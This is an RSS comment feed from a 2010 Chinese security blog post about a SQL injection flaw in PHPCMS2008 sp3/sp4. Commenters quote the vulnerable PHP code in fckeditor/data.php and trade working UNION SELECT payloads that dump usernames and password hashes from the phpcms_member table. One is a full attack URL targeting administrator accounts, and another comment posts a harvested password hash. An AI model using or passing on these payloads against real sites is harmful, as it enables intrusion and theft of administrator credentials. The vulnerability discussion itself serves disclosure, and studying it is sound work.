<![CDATA[PHPCMS2008 sp3、sp4 SQL注入漏洞 & exp]]> http://www.oldjun.com/blog/index.php/archives/68/ Looking for change zh-cn-utf8 http://blogs.law.harvard.edu/tech/rss Magike 1.2.0 Release oldjun <![CDATA[老显]]> http://www.oldjun.com/blog/index.php/archives/68/#comment-770 > http://www.oldjun.com/blog/index.php/archives/68/#comment-770 Tue, 27 Jul 2010 16:57:01 +0800 都在忙着发布新版本,推出新特性,抢占商机,谁还管这些啊,毕竟都向qian走了

]]> <![CDATA[cao2109]]> http://www.oldjun.com/blog/index.php/archives/68/#comment-771 > http://www.oldjun.com/blog/index.php/archives/68/#comment-771 Tue, 27 Jul 2010 17:54:20 +0800 1)    {     $hour_start = TIME - $hour*3600;     $hour_end = TIME - ($hour-1)*3600;     $where_time = " AND created_time>=$hour_start AND created_time=$hour_end";    }    else    {    $where_time = '';    }    $data = array();    $result = $db->query("SELECT `created_time`,`id` FROM ".DB_PRE."editor_data WHERE userid=$_userid AND editorid='$editorid' $where_time ORDER BY id DESC"); 所以sp4还得有个条件hour0%20union%20select%201,concat(username,0x3a,password)%20from%20phpcms_member/*]]> 恩,最后一句是亮点。
你这是sp3的代码,sp4和这个不一样。
case 'get':
   $hour = intval($hour);
  
   if($hour>1)
   {
    $hour_start = TIME - $hour*3600;
    $hour_end = TIME - ($hour-1)*3600;
    $where_time = " AND created_time>=$hour_start AND created_time=$hour_end";
   }
   else
   {
   $where_time = '';
   }
   $data = array();
   $result = $db->query("SELECT `created_time`,`id` FROM ".DB_PRE."editor_data WHERE userid=$_userid AND editorid='$editorid' $where_time ORDER BY id DESC");

所以sp4还得有个条件hour0%20union%20select%201,concat(username,0x3a,password)%20from%20phpcms_member/*

]]> <![CDATA[cao2109]]> http://www.oldjun.com/blog/index.php/archives/68/#comment-772 > http://www.oldjun.com/blog/index.php/archives/68/#comment-772 Tue, 27 Jul 2010 17:55:43 +0800 1)         {             $hour_start = TIME - $hour*3600;             $hour_end = TIME - ($hour-1)*3600;             $where_time = " AND created_time>=$hour_start AND created_time=$hour_end";         }         else         {             $where_time = '';         }         $data = array();         $result = $db->query("SELECT `created_time`,`id` FROM ".DB_PRE."editor_data WHERE userid=$_userid AND editorid='$editorid' $where_time ORDER BY id DESC");]]> 汗 怎么中间还丢代码啊
if($hour>1)
        {
            $hour_start = TIME - $hour*3600;
            $hour_end = TIME - ($hour-1)*3600;
            $where_time = " AND created_time>=$hour_start AND created_time=$hour_end";
        }
        else
        {
            $where_time = '';
        }
        $data = array();
        $result = $db->query("SELECT `created_time`,`id` FROM ".DB_PRE."editor_data WHERE userid=$_userid AND editorid='$editorid' $where_time ORDER BY id DESC");

]]> <![CDATA[cao2109]]> http://www.oldjun.com/blog/index.php/archives/68/#comment-773 > http://www.oldjun.com/blog/index.php/archives/68/#comment-773 Tue, 27 Jul 2010 17:56:09 +0800 我了个去,中间果然丢了句代码....

]]> <![CDATA[oldjun]]> http://www.oldjun.com/blog/index.php/archives/68/#comment-774 > http://www.oldjun.com/blog/index.php/archives/68/#comment-774 Tue, 27 Jul 2010 18:03:25 +0800 1)         {             $hour_start = TIME - $hour*3600;             $hour_end = TIME - ($hour-1)*3600;             $where_time = " AND created_time>=$hour_start AND created_time=$hour_end";         }         else         {             $where_time = '';         }]]> 最新的sp4版已经修复此问题了~

        if($hour>1)
        {
            $hour_start = TIME - $hour*3600;
            $hour_end = TIME - ($hour-1)*3600;
            $where_time = " AND created_time>=$hour_start AND created_time=$hour_end";
        }
        else
        {
            $where_time = '';
        }

]]> <![CDATA[雨中风铃]]> http://www.oldjun.com/blog/index.php/archives/68/#comment-775 > http://www.oldjun.com/blog/index.php/archives/68/#comment-775 Tue, 27 Jul 2010 19:43:33 +0800 为什么不直接登录,然后在地址栏爆出密码:
http://TargerHost/fckeditor/data.php?action=get&where_time=1=2 union all select 1,concat(username,0x7C0D0A,password) from phpcms_member where groupid=1#

]]> <![CDATA[oldjun]]> http://www.oldjun.com/blog/index.php/archives/68/#comment-776 > http://www.oldjun.com/blog/index.php/archives/68/#comment-776 Tue, 27 Jul 2010 21:38:42 +0800 一样的。。。

]]> <![CDATA[8888]]> http://www.oldjun.com/blog/index.php/archives/68/#comment-777 > http://www.oldjun.com/blog/index.php/archives/68/#comment-777 Thu, 29 Jul 2010 09:00:57 +0800 e367ab21170e6bb21415b5878bddb035

phpcms2008破解出来的MD5密码是破解不出来的,放弃吧

]]> <![CDATA[俺是农村的]]> http://www.oldjun.com/blog/index.php/archives/68/#comment-778 > http://www.oldjun.com/blog/index.php/archives/68/#comment-778 Thu, 29 Jul 2010 20:34:47 +0800 最近漏洞很多,涉及各款CMS、BBS、SHOP...请大家及时关注!

呵呵

]]> <![CDATA[俺是种田的]]> http://www.oldjun.com/blog/index.php/archives/68/#comment-780 > http://www.oldjun.com/blog/index.php/archives/68/#comment-780 Fri, 30 Jul 2010 07:17:48 +0800 向各位牛人们学习了。。。。

]]> <![CDATA[狂狼]]> http://www.oldjun.com/blog/index.php/archives/68/#comment-782 > http://www.oldjun.com/blog/index.php/archives/68/#comment-782 Sun, 01 Aug 2010 05:21:06 +0800 哈哈,.学习了

]]> <![CDATA[Phpwind 注入以及利用之一:远程代码执行 « koohik's blog]]> http://www.oldjun.com/blog/index.php/archives/68/#comment-1346 > http://www.oldjun.com/blog/index.php/archives/68/#comment-1346 Wed, 13 Oct 2010 04:39:53 +0800 [...][...]

]]> <![CDATA[跑不出来username password]]> http://www.oldjun.com/blog/index.php/archives/68/#comment-1528 > http://www.oldjun.com/blog/index.php/archives/68/#comment-1528 Wed, 06 Apr 2011 21:51:50 +0800 fckeditor/data.php?action=get&where_time=1=2 union all select 1,concat(username,0x7C0D0A,password) from phpcms_member where groupid=1#

不知道为什么跑不出来呢~~

]]>